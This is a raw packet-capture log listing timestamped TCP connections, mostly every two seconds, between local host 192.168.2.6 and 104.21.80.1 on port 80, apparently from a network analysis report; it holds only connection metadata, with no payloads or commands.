Feb 20, 2025 15:06:59.874419928 CET	80	49884	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:01.008765936 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:01.013791084 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:01.013917923 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:01.016081095 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:01.021116018 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:01.021173000 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:01.026154041 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.752197027 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.752269983 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.752347946 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:02.752454042 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.753213882 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:02.754445076 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.754506111 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:02.756795883 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:02.756819010 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:02.757105112 CET	49897	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:02.760325909 CET	80	49897	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:03.943646908 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:03.948803902 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:03.948906898 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:03.951026917 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:03.956072092 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:03.956144094 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:03.961142063 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:04.711790085 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:04.713238001 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:04.715146065 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:04.715236902 CET	49912	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:04.720212936 CET	80	49912	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:05.865848064 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:05.870877981 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:05.870970964 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:05.873155117 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:05.878110886 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:05.878160954 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:05.883163929 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:06.708833933 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:06.708944082 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:06.709358931 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:06.709410906 CET	49923	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:06.713979006 CET	80	49923	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:07.959743023 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:07.964806080 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:07.964881897 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:07.968241930 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:07.973206997 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:07.973258018 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:07.978219032 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:08.770853043 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:08.770998955 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:08.771445036 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:08.771558046 CET	49938	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:08.776088953 CET	80	49938	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:09.952574015 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:09.957683086 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:09.957777023 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:09.959754944 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:09.964760065 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:09.964813948 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:09.969806910 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:10.623655081 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:10.624474049 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:10.625118017 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:10.636570930 CET	49951	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:10.641582012 CET	80	49951	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:11.927619934 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:11.932807922 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:11.933007002 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:11.935151100 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:11.940148115 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:11.940213919 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:11.945164919 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:12.651485920 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:12.651602030 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:12.652612925 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:12.653186083 CET	49961	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:12.656656981 CET	80	49961	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:13.819861889 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:13.824991941 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:13.825081110 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:13.827364922 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:13.832365990 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:13.832443953 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:13.837460995 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:14.466414928 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:14.466573000 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:14.468236923 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:14.468298912 CET	49974	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:14.471577883 CET	80	49974	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:15.622122049 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:15.627151966 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:15.630572081 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:15.632596016 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:15.637593985 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:15.638534069 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:15.643554926 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:16.371341944 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:16.371558905 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:16.372123003 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:16.372191906 CET	49986	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:16.376657009 CET	80	49986	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:17.546371937 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:17.551490068 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:17.551580906 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:17.553330898 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:17.558311939 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:17.558386087 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:17.563400030 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:18.401190996 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:18.401402950 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:18.402558088 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:18.402874947 CET	49998	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:18.406522036 CET	80	49998	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:19.539066076 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:19.544213057 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:19.545942068 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:19.547914982 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:19.552926064 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:19.553016901 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:19.558026075 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:20.289845943 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:20.290539026 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:20.291085005 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:20.291188955 CET	50008	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:20.295536041 CET	80	50008	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:21.462584019 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:21.467727900 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:21.467968941 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:21.470108032 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:21.475150108 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:21.475251913 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:21.480360985 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:22.298964024 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:22.299093962 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:22.299777985 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:22.299833059 CET	50010	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:22.304229975 CET	80	50010	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:23.445348024 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:23.450557947 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:23.450668097 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:23.452405930 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:23.457365036 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:23.458173037 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:23.463166952 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:24.195916891 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:24.196182013 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:24.197240114 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:24.197307110 CET	50011	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:24.201174974 CET	80	50011	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:25.354859114 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:25.359937906 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:25.360027075 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:25.362031937 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:25.367553949 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:25.367620945 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:25.372612000 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:26.167548895 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:26.167859077 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:26.167948961 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:26.168016911 CET	50012	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:26.172921896 CET	80	50012	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:27.318700075 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:27.323909998 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:27.324043989 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:27.325853109 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:27.330893993 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:27.330955982 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:27.335972071 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:28.038355112 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:28.038526058 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:28.039354086 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:28.039406061 CET	50013	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:28.044404984 CET	80	50013	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.194389105 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.199498892 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.199604988 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.201344967 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.206326008 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.206393003 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.211373091 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.915473938 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.916862965 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:29.916992903 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.924149036 CET	50014	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:29.929179907 CET	80	50014	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.082575083 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.087640047 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.087749958 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.089487076 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.094482899 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.094569921 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.099634886 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.846661091 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.846949100 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.847460032 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:31.847522974 CET	50015	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:31.851979971 CET	80	50015	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.010092020 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.015180111 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.015331984 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.017165899 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.022160053 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.022212982 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.027209997 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.870053053 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.870284081 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.871579885 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:33.871632099 CET	50017	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:33.875319958 CET	80	50017	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.021764040 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.026843071 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.026940107 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.028707027 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.033771992 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.033842087 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.038898945 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.752533913 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.752737045 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.753206015 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:35.753254890 CET	50018	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:35.757903099 CET	80	50018	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:36.930583000 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:36.935719013 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:36.936285973 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:36.938810110 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:36.944961071 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:36.945111990 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:36.950208902 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:37.734409094 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:37.734688997 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:37.735095978 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:37.735095978 CET	50019	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:37.740209103 CET	80	50019	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:38.894799948 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:38.920228004 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:38.920387983 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:38.922544956 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:38.927521944 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:38.927592039 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:38.932598114 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:39.714694977 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:39.714801073 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:39.715056896 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:39.715112925 CET	50020	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:39.719825983 CET	80	50020	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:40.865026951 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:40.870572090 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:40.870697021 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:40.872845888 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:40.878123045 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:40.878180981 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:40.886540890 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:41.671948910 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:41.671979904 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:41.672229052 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:41.672229052 CET	50021	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:41.679249048 CET	80	50021	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:42.833198071 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:42.838340998 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:42.838498116 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:42.840439081 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:42.845465899 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:42.845534086 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:42.850563049 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:43.653316021 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:43.653351068 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:43.653448105 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:43.653614044 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:43.653614044 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:43.653614044 CET	50022	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:43.658699036 CET	80	50022	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:44.812510967 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:44.817744970 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:44.817858934 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:44.819883108 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:44.825120926 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:44.825217009 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:44.830277920 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:45.616121054 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:45.616285086 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:45.617125988 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:45.617180109 CET	50023	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:45.621484995 CET	80	50023	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:46.976876974 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.030793905 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:47.031059980 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.033047915 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.037986040 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:47.038070917 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.043016911 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:47.845094919 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:47.845405102 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.846210003 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:47.846506119 CET	50025	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:47.850548983 CET	80	50025	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:48.991760969 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:48.997106075 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:48.997236013 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:48.999012947 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:49.004096985 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:49.004231930 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:49.009329081 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:49.785264015 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:49.785396099 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:49.785590887 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:49.785670042 CET	50026	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:49.790447950 CET	80	50026	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:50.930483103 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:50.935656071 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:50.935770035 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:50.937803030 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:50.942794085 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:50.942877054 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:50.947870970 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:51.729665995 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:51.729948997 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:51.730015993 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:51.730062962 CET	50027	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:51.735061884 CET	80	50027	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:52.899214029 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:52.904378891 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:52.904453039 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:52.906805992 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:52.911788940 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:52.911839962 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:52.916769981 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:53.712904930 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:53.713076115 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:53.713824034 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:53.713886976 CET	50028	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:53.718153000 CET	80	50028	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:54.868669987 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:54.874092102 CET	80	50029	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:54.874195099 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:54.876337051 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:54.881323099 CET	80	50029	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:54.881380081 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:54.886354923 CET	80	50029	104.21.80.1	192.168.2.6
